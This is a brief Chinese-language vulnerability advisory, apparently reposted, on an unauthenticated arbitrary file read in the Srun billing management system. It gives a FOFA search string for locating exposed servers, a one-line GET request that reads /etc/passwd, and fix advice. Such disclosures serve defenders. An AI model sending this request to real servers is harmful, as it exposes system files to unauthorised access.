深澜计费管理系统存在任意文件读取漏洞,该漏洞可能导致未授权的攻击者获取服务器上的任意文件,以下是对该漏洞的详细介绍:
| 项目 | 详细信息 |
| 产品简介 | 深澜计费管理系统是一套完善的、领先的具有复杂生物型特征的弹性认证计费系统,主要由AAA认证计费平台、系统运营维护管理平台、用户及策略管理平台、用户自助服务平台、智能客户端模块、消息推送模块以及数据统计模块组成,该系统为全球超过2500家客户提供服务,其中包括中国Top100高校中的60%选用本产品。 |
| 漏洞 | 深澜计费管理系统存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取服务器任意文件。 |
| 影响范围 | 深澜计费管理系统。 |
| 复现环境 | FOFA:body="/js/lib/slimscroll.js"。 |
| 漏洞复现 | GET /user/group/down-load?file=/etc/passwd HTTP/1.1。 |
| 修复建议 | 关闭互联网暴露面或设置接口访问权限,升级至安全版本。 |
深澜计费管理系统的任意文件读取漏洞是一个严重的安全问题,需要立即采取措施进行修复。
(图片来源网络,侵删)
以上内容就是解答有关深澜漏洞的详细内容了,我相信这篇文章可以为您解决一些疑惑,有任何问题欢迎留言反馈,谢谢阅读。
(图片来源网络,侵删)
本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/73883.html
